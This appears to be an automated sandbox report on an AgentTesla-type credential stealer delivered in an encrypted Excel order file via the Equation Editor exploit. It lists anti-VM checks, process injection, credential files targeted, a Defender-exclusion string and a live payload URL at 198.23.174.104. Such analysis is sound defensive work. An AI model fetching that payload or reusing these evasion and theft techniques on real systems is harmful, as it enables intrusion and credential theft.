Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp Binary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp Binary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: New Order for April#89032.xlsx ReversingLabs: Detection: 31%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: New Order for April#89032.xlsx Static file information: File size 2269696 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: New Order for April#89032.xlsx Initial sample: OLE indicators vbamacros = False
Source: New Order for April#89032.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00DC858F push dword ptr [esi+3Fh]; iretd 4_2_00DC85A1
Source: C:\Users\Public\vbc.exe Code function: 4_2_00DC92FB push FFFFFFD9h; iretd 4_2_00DC9318
Source: C:\Users\Public\vbc.exe Code function: 4_2_00536E00 pushad ; iretd 4_2_00536E01
Source: C:\Users\Public\vbc.exe Code function: 5_2_00DC858F push dword ptr [esi+3Fh]; iretd 5_2_00DC85A1
Source: C:\Users\Public\vbc.exe Code function: 5_2_00DC92FB push FFFFFFD9h; iretd 5_2_00DC9318
Source: initial sample Static PE information: section name: .text entropy: 7.54549317516

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hkn[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: New Order for April#89032.xlsx Stream path 'EncryptedPackage' entropy: 7.9999090543 (max. 8.0)

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2672, type: MEMORY
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\Public\vbc.exe Window / User API: threadDelayed 9672 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2556 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2724 Thread sleep time: -103949s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1684 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2688 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2960 Thread sleep time: -480000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1900 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1900 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1336 Thread sleep count: 9672 > 30 Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1336 Thread sleep count: 65 > 30 Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1900 Thread sleep count: 102 > 30 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 103949 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 30000 Jump to behavior
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: New Order for April#89032.xlsx Binary or memory string: u<qEmu
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: vbc.exe, 00000005.00000002.2380657176.0000000000E90000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: vbc.exe, 00000005.00000002.2380657176.0000000000E90000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000005.00000002.2380657176.0000000000E90000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected AgentTesla
Source: Yara match File source: 00000005.00000002.2380779380.0000000002560000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2380056335.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2168116812.00000000033AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2672, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY
Source: Yara match File source: 4.2.vbc.exe.3446ec0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3446ec0.3.raw.unpack, type: UNPACKEDPE
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Mail credentials (via file access)
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY

Remote Access Functionality:

barindex
Yara detected AgentTesla
Source: Yara match File source: 00000005.00000002.2380779380.0000000002560000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2380056335.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2168116812.00000000033AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2672, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY
Source: Yara match File source: 4.2.vbc.exe.3446ec0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3446ec0.3.raw.unpack, type: UNPACKEDPE
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 383941 Sample: New Order for April#89032.xlsx Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 31 Found malware configuration 2->31 33 Antivirus detection for URL or domain 2->33 35 Multi AV Scanner detection for dropped file 2->35 37 12 other signatures 2->37 7 EQNEDT32.EXE 12 2->7         started        12 EXCEL.EXE 38 34 2->12         started        process3 dnsIp4 29 198.23.174.104, 49167, 80 AS-COLOCROSSINGUS United States 7->29 21 C:\Users\user\AppData\Local\...\hkn[1].exe, PE32 7->21 dropped 23 C:\Users\Public\vbc.exe, PE32 7->23 dropped 47 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->47 14 vbc.exe 7->14         started        25 C:\Users\...\~$New Order for April#89032.xlsx, data 12->25 dropped file5 signatures6 process7 signatures8 49 Multi AV Scanner detection for dropped file 14->49 51 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->51 53 Machine Learning detection for dropped file 14->53 55 2 other signatures 14->55 17 vbc.exe 12 2 14->17         started        process9 dnsIp10 27 api.telegram.org 149.154.167.220, 443, 49168 TELEGRAMRU United Kingdom 17->27 39 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->39 41 Tries to steal Mail credentials (via file access) 17->41 43 Tries to harvest and steal ftp login credentials 17->43 45 Tries to harvest and steal browser information (history, passwords, etc) 17->45 signatures11
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
198.23.174.104
 unknown United States
36352 AS-COLOCROSSINGUS true

Contacted Domains

Name IP Active
api.telegram.org 149.154.167.220 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://198.23.174.104/hkn.exe true
  • Avira URL Cloud: malware
 unknown